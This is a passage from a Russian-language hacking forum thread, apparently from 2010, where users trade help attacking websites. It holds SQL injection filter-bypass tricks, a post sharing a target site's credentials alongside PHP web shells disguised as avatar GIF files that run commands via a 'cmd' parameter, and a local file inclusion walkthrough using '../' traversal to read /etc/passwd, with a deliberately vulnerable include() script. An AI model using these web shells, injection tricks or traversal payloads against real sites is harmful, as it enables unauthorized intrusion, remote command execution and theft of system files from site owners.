Старый 20.09.2010, 21:15   #341
skM
 
Регистрация: 06.07.2010
Сообщений: 95
Репутация: 8
По умолчанию

Цитата:
Сообщение от nomad Посмотреть сообщение
Попробуй разные регистры, например, uNIon+sElEct
пробовал, толку - 0

еще варианты есть?
skM вне форума   Ответить с цитированием
Старый 20.09.2010, 21:18   #342
SeNaP
 
Аватар для SeNaP
 
Регистрация: 03.08.2010
Сообщений: 152
Репутация: 10
По умолчанию

Возможно ли как нибудть раскрыть пути к WWW имея доступ только к БД?
SeNaP вне форума   Ответить с цитированием
Старый 20.09.2010, 21:50   #343
Jokester
 
Аватар для Jokester
 
Регистрация: 01.07.2010
Сообщений: 250
Репутация: 155
По умолчанию

skM
Sweb? Пробуй постом, пробуй без union (как слепую) у них отличаются настройки на разных серваках, может прокатить, а может и нет.
__________________
------------------

Последний раз редактировалось Jokester; 20.09.2010 в 21:54.. Причина: прогнал =\
Jokester вне форума   Ответить с цитированием
Старый 20.09.2010, 22:58   #344
mailbrush
 
Регистрация: 06.07.2010
Сообщений: 47
Репутация: 4
По умолчанию

Цитата:
Сообщение от Cross Посмотреть сообщение
Так что, в моем случае это всё - финиш?
Нет, вы немного не так все делаете, пересмотрите мое сообщение...
mailbrush вне форума   Ответить с цитированием
Старый 20.09.2010, 23:15   #345
skM
 
Регистрация: 06.07.2010
Сообщений: 95
Репутация: 8
По умолчанию

Цитата:
Сообщение от Jokester Посмотреть сообщение
skM
Sweb? Пробуй постом, пробуй без union (как слепую) у них отличаются настройки на разных серваках, может прокатить, а может и нет.
нет, не sweb, с ним я уже сталкивался.
да, она слепая, но без юниона тоже никак.
Цитата:
select+from
<- вот здесь уже фильтрует. но в
Цитата:
from+select
все ок. я все-таки думаю на последовательность..

например при
Цитата:
select123454321from
тоже фильтрует.
skM вне форума   Ответить с цитированием
Старый 20.09.2010, 23:25   #346
Cross
 
Регистрация: 27.08.2010
Сообщений: 114
Репутация: 2
По умолчанию

Цитата:
Сообщение от mailbrush Посмотреть сообщение
Нет, вы немного не так все делаете, пересмотрите мое сообщение...
Я не силен в жаргоне, что значит проинклудь? Но тем не менее не получается...

Если кому-нибудь не сложно сделать, так сказать, правильно, то что mailbrush объяснил, то вот:
Цитата:
site:***.ua
login:qwerty
pass:123456
В выпадающем списке аватарок, в самом низу, есть new.gif и xd.gif - вот их содержимое:
Цитата:
new.gif - <?php system($_GET['cmd']);?>
xd.gif - <?php system($_GET[cmd]);?>
разница лишь в кавычках

Последний раз редактировалось Twost; 14.05.2013 в 15:22..
Cross вне форума   Ответить с цитированием
Старый 21.09.2010, 17:18   #347
Raz0r
 
Аватар для Raz0r
 
Регистрация: 17.07.2010
Сообщений: 100
Репутация: 78
По умолчанию

Цитата:
Сообщение от Cross Посмотреть сообщение
Я не силен в жаргоне, что значит проинклудь?
"проинклудить" значит воспользоваться уязвимостью типа PHP Local / Remote Inclusion. Я уже в третий раз пишу: в конкретно этом сайте нет этой уязвимости, и я не понимаю, чем хочет помочь товарищ mailbrush. Если просто показать как работает инклуд, то это надо делать на работающем примере.
Raz0r вне форума   Ответить с цитированием
Старый 21.09.2010, 22:09   #348
Cross
 
Регистрация: 27.08.2010
Сообщений: 114
Репутация: 2
По умолчанию

Добрый вечер.

Вопрос по php-include:
Не могу разобраться с конструкцией вида index.php?page=../../etc/passwd
Отчего зависит количество "../../"? Количество этих комбинаций следует перебирать от больше к меньшему? (к примеру наваять их штук 20 и по одной удалять). Есть тулза по автоматизации этого процесса? И кстати, т.к. фф конвертирует нулл-байт после каждого нажатия энтера...вообщем что тут посоветуете?
В теме "php-include", в постах юзеров, после знака = идут как .. так и /, т.е. инклуд начинается как с того так и сэтого символа, вперемешку...отчего это зависит?
Или есть мануал отвечающий на эти вопросы? (за целый день такого не нашел)
Cross вне форума   Ответить с цитированием
Старый 21.09.2010, 22:19   #349
Nightmare
Banned
 
Регистрация: 06.07.2010
Сообщений: 162
Репутация: 10
По умолчанию

Цитата:
Сообщение от Cross Посмотреть сообщение
Добрый вечер.

Вопрос по php-include:
Не могу разобраться с конструкцией вида index.php?page=../../etc/passwd
Отчего зависит количество "../../"? Количество этих комбинаций следует перебирать от больше к меньшему? (к примеру наваять их штук 20 и по одной удалять). Есть тулза по автоматизации этого процесса? И кстати, т.к. фф конвертирует нулл-байт после каждого нажатия энтера...вообщем что тут посоветуете?
В теме "php-include", в постах юзеров, после знака = идут как .. так и /, т.е. инклуд начинается как с того так и сэтого символа, вперемешку...отчего это зависит?
Или есть мануал отвечающий на эти вопросы? (за целый день такого не нашел)

конструкции вида ../ обозначают каталоги (директории, папки и так далее) конструкция ./ в php обозначает текущий каталог. конструкция ../ обозначает переход к предыдущему каталогу минуя его имя.
то есть директория скажем /home/dir1/dir2/
используя ../ ты переместишься /home/dir1/ используя ../../ ты переместишься /home/ и так далее.

То есть путь на сайте:
/home/war/dir/www/site/www2/index.php
а пароли тут:
/home/etc/passwd (passwd - кстати файл, его часто путают с директорией)
тогда делаем так: /index.php?lol=../../../../../etc/passwd
Используем 5 пропусков директорий, и мы находимся в /home/ а далее поднимаемся в /ets/

Количество этих комбинаций на каждом сайте индивидуально, ибо у каждого своя структура директорий, у кого то больше, у кого то меньше. но не так уж и много. это вам не колонки к скулям =)))

И да, нул байт так же пашет не везде, потому что требует выключенных волшебных ковычек, а по умолчанию в конфиге они заразы включены во первых, а во вторых это небезопасно и глупо.
Nightmare вне форума   Ответить с цитированием
Старый 21.09.2010, 22:54   #350
M.W.N.N.
 
Аватар для M.W.N.N.
 
Регистрация: 05.07.2010
Сообщений: 51
Репутация: 7
По умолчанию

Цитата:
Сообщение от Nightmare Посмотреть сообщение
Количество этих комбинаций на каждом сайте индивидуально, ибо у каждого своя структура директорий, у кого то больше, у кого то меньше. но не так уж и много. это вам не колонки к скулям =)))
Код:
laptop:~$ cd /var/www
laptop:/var/www$ cd ../../../../../../etc/
laptop:/etc$
test.php
PHP код:
<?php
$lol
=$_GET['name'];
include(
"$lol");
?>
in.php
PHP код:
<?php
echo "sdfsdf";
?>
http://127.0.0.1/test.php?name=in.php
Все гуд
путь до скрипта in.php - /var/www
Пробуем http://127.0.0.1/test.php?name=../../../../../../../../../../../../../../../etc/passwd
И все гуд.

Какая разница сколько там будет переходов в каталог выше, все равно выше / вы не попадете?!
Ну путаем народ!
M.W.N.N. вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot